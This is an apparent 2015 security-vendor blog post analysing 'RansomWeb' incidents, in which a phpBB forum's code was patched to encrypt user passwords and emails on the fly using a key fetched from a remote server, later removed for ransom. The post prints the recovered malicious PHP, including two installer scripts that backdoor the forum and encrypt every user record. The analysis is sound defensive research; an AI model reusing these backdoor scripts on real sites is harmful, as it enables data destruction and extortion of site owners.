Stay in touch

Application security insights and invitations to exclusive events in your inbox


Your data will stay confidential Private and Confidential

RansomWeb: emerging website threat that may outshine DDoS, data theft and defacements?

Wednesday, January 28, 2015 By

More and more people become victims of ransomware, a malware that encrypts your data and demand money to decrypt them. A new trend on the market shows that cybercriminals will now target your website as well to get a ransom payment from you.


More and more people become victims of ransomware, a malware that encrypts your data and demands money to decrypt them. A new trend on the market shows that cybercriminals will now target your website as well to get a ransom payment from you.
RansomWeb: emerging website threat that may outshine DDoS, data theft and defacements?

In December 2014, our security experts discovered a very interesting case of a financial company website compromise: the website was out of service displaying a database error, while the website owner got an email asking for a ransom to “decrypt the database”. Web application in question was pretty simple and small, but very important for business of the company that could not afford to suspend it, neither to announce its compromise. Careful investigation that we performed revealed the following:

  • The web application was compromised six months ago, several server scripts were modified to encrypt data before inserting it into the database, and to decrypt after getting data from the database. A sort of “on-fly” patching invisible to web application users.
  • Only the most critical fields of the database tables were encrypted (probably not to impact web application performance a lot). All previously existing database records were encrypted accordingly.
  • Encryption key was stored on a remote web server accessible only via HTTPS (probably to avoid key interception by various traffic monitoring systems).
  • During six months, hackers were silently waiting, while backups were being overwritten by the recent versions of the database.
  • At the day X, hackers removed the key from the remote server. Database became unusable, website went out of service, and hackers demanded a ransom for the encryption key.

We were sure that it was an individual example of a sophisticated APT targeting concrete company, however last week we faced another similar case. One of our customers, an SMB, was blackmailed after his… phpBB forum went out of order. The forum was used as a main platform for customer support, and therefore was important for the customer.

It was the latest phpBB 3.1.2 released on the 25th of November 2014. No user could login (including forum moderators and admins). The forum was online, however all functions that require forum user to be authenticated didn’t work. Our thorough investigation revealed that forum engine was patched in such a way that users’ passwords and emails were encrypted “on-fly” between the web application and the database.

The following files were modified:

1. File “factory.php” has its “sql_fetchrow()” function modified in such a manner that the result of SQL query “$result = $this->get_driver()->sql_fetchrow($query_id);” in array “result” will have decrypted values of “user_password” and “user_email” table fields:

if(isset($result['user_password'])){
 
$result['user_password'] = $cipher->decrypt($result['user_password']);
}
if(isset(
$result['user_email'])){
 
$result['user_email'] = $cipher->decrypt($result['user_email']);
}

2. File “functions_user.php” has a modified version of “user_add” function to add encryption:

$sql_ary = array(
 
'username'=>$user_row['username'],
 
'username_clean' => $username_clean,
 
'user_password' => (isset($user_row['user_password']))?
    
$cipher->encrypt($user_row['user_password']):$cipher->encrypt(''),
 
'user_email'=> $cipher->encrypt(strtolower($user_row['user_email'])),
 
'user_email_hash'=> phpbb_email_hash($user_row['user_email']),
 
'group_id' => $user_row['group_id'],
 
'user_type' => $user_row['user_type'],
);

3. File “cp_activate.php” has a modified version of function “main()”:

$sql_ary = array(
 
'user_actkey' => '',
 
'user_password' => $cipher->encrypt($user_row['user_newpasswd']),
 
'user_newpasswd' => '',
 
'user_login_attempts' => 0,
);

4. File “ucp_profile.php” has a modified version of function “main()”:

if (sizeof($sql_ary))
{
 
$sql_ary['user_email'] = $cipher->encrypt($sql_ary['user_email']);
 
$sql_ary['user_password'] = $cipher->encrypt($sql_ary['user_password']);
 
$sql 'UPDATE ' USERS_TABLE '
  SET ' 
$db->sql_build_array('UPDATE'$sql_ary) . '
  WHERE user_id = ' 
$user->data['user_id'];
 
$db->sql_query($sql);

5. File “config.php” had the following modification:

class Cipher {
 private 
$securekey$iv;
 function 
__construct($textkey) {
  
$this->securekey hash('sha256',$textkey,TRUE);
  
$this->iv mcrypt_create_iv(32);
 }
 function 
encrypt($input) {
  return 
base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
       
$this->securekey$inputMCRYPT_MODE_ECB$this->iv));
 }
 function 
decrypt($input) {
  return 
trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
       
$this->securekeybase64_decode($input), MCRYPT_MODE_ECB$this->iv));
 }
}
$key=file_get_contents('https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt'
);
$cipher=new Cipher($key);

Moreover, we found two backdoor installation scripts left by hackers on the server that permit to backdoor any phpBB forum with just a couple of clicks. The first installer patches "config.php" file to add "Cipher" class that decrypts and encrypts the data with PHP "mcrypt_encrypt()" function storing the encryption key on a remote server:

<?php
$file 
'../config.php';
$txt "\n".'class Cipher {
 private $securekey, $iv;
 function __construct($textkey) {
  $this->securekey = hash(\'sha256\',$textkey,TRUE);
  $this->iv = mcrypt_create_iv(32);
 }
 function encrypt($input) {
  return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
     $this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
  }
 function decrypt($input) {
  return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
     $this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
 }
}
$key=file_get_contents(\'https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt\');
$cipher=new Cipher($key);'
."\n";
if( 
FALSE !== file_put_contents($file$txtFILE_APPEND LOCK_EX)){
 echo 
"DONE!";
};

And the second installer parses all existing phpBB users to encrypt their emails and passwords, and replaces the above-mentioned phpBB files with backdoored copies:

<?php
define
('IN_PHPBB'true);
$phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH '../';
$phpEx substr(strrchr(__FILE__'.'), 1);
include(
$phpbb_root_path 'common.' $phpEx);
include(
$phpbb_root_path 'includes/functions_display.' $phpEx);
$sql 'SELECT user_id, user_password, user_email FROM ' USERS_TABLE;
$result $db->sql_query($sql);
while (
$row $db->sql_fetchrow($result))
{
 
$sql2 'UPDATE ' USERS_TABLE '
  SET
   user_password = "'
.$cipher->encrypt($row['user_password']).'",
   user_email = "'
.$cipher->encrypt($row['user_email']).'"
  WHERE user_id = '
.$row['user_id'];
 
$result2 $db->sql_query($sql2);
}
echo 
"SQL UPDATED!<br>";
copy('factory.php''../phpbb/db/driver/factory.php');
copy('functions_user.php''../includes/functions_user.php');
copy('ucp_activate.php''../includes/ucp/ucp_activate.php');
copy('ucp_profile.php''../includes/ucp/ucp_profile.php');
echo 
"FILES UPDATED!";

Attackers waited for 2 months and then just removed the key from the remote server. Later we discovered that phpBB was compromised via stolen FTP password, security of phpBB software is not related to the incident in any way.

For the moment no antivirus software detects even the installers as a known malware:

Following the wage of Ransomware attacks, we called this hacking technique RansomWeb. Let’s try to make a brief analysis of RansomWeb attacks:

Potential Opportunities of RansomWeb:

  • Differently from DDoS attacks they can have everlasting impact on web application availability.
  • May be used not only for blackmailing but for long-term website destruction.
  • Backups cannot help a lot, as the database will be backuped in encrypted mode, while the encryption key is stored remotely and will not be backuped.
  • Almost impossible to recover from the attack without paying the ransom, many victims won’t have a choice but to pay hackers.
  • Hosting companies are not ready for this new challenge, and probably won’t be able to help their customers.

Potential Weaknesses of RansomWeb:

  • Can be easily detected by a file integrity monitor (however, very few companies do file integrity monitoring for web applications that may change every day).
  • Pretty difficult to encrypt entire database without damaging web application functionality and/or speed (nevertheless, even one DB field that is unrecoverable may ruin a web application).
  • May be detected pretty quickly when used on regularly-updated web application.

Ilia Kolochenko, CEO of High-Tech Bridge says: "We are probably facing a new emerging threat for websites that may outshine defacements and DDoS attacks. RansomWeb attacks may cause unrepairable damage, they are very easy to cause and pretty difficult to prevent. Days when hackers were attacking websites for glory or fun are over, now financial profit drives them. The era of web blackmailing, racket and chantage is about to start."

Marsel Nizamutdinov, Chief Research Officer, adds: "Cyber blackmailing and ransomware exists since a while already, however websites is a new vector of chantage. We have tens of millions of vulnerable web applications with critical data, and hackers will definitely not miss such a great opportunity to make money on negligent website administrators."

Ilia Kolochenko continues: "The only way to prevent such attacks is to combine regular security monitoring with web application penetration testing."

Will RansomWeb attacks outperform by efficiency and profitability DDoS, defacements, and data theft attacks against websites? Quite probably this question will be answered in 2015.


High-Tech Bridge Security Research Team regularly writes about web and mobile application security, privacy, Machine Learning and AI.

User Comments
Add Comment
6 responses to "RansomWeb: emerging website threat that may outshine DDoS, data theft and defacements?"
Anonymous 2015-01-29 01:49:02 UTC Comment this
Did you determine how the scripts were modified? I mean what lead to the access that allowed the attackers to
modify the files and encrypt the dB?
If simple controls and operational security would have protected the victims that should be added to the article
as an update.
Greg Augustinus 2015-01-31 12:36:43 UTC Comment this
Admin access should be restricted to only ssh/sftp sessions using PKI, so useless even if password known/brute forced. Of course one must keep the keys safe and its no protection against vulnerabilities in the web app/os itself, but patching/scanning/pen testing and finally log monitoring do the rest.
Anonymous 2015-02-04 02:26:06 UTC Comment this
Anonymous wrote:
Did you determine how the scripts were modified? I mean what
lead to the access that allowed the attackers to
modify the files and encrypt the dB?
If simple controls and operational security would have protected the victims
that should be added to the article
as an update.
It's right there under the code snips:
"Later we discovered that phpBB was compromised via stolen FTP password."

This is also relevant to @GregAugustinus because, whilst providing good advice
about using PKI for SSH, this wouldn't have helped in this case...
DBA 2015-02-07 21:28:03 UTC Comment this
Financial site, mission critical app...running PHPBB ? Huge lesson to be seen there.
Kail 2015-02-07 21:41:07 UTC Comment this
DBA wrote:
Financial site, mission critical app...running PHPBB ? Huge lesson to be seen there.
LOL, nope it was the second victim who was running phpBB
Jim Weiler 2015-11-09 14:36:51 UTC Comment this
It sounds like another indicator would be the script server making outbound
connections to the remote server with the key, every time a record that was
maliciously encrypted was accessed.. Is that what is meant by 'May be
detected pretty quickly when used on regularly-updated web application.'
↑ Back to Top

High-Tech Bridge on Facebook High-Tech Bridge on Twitter High-Tech Bridge on LinkedIn High-Tech Bridge RSS Feeds Send by Email
Share
Let's Talk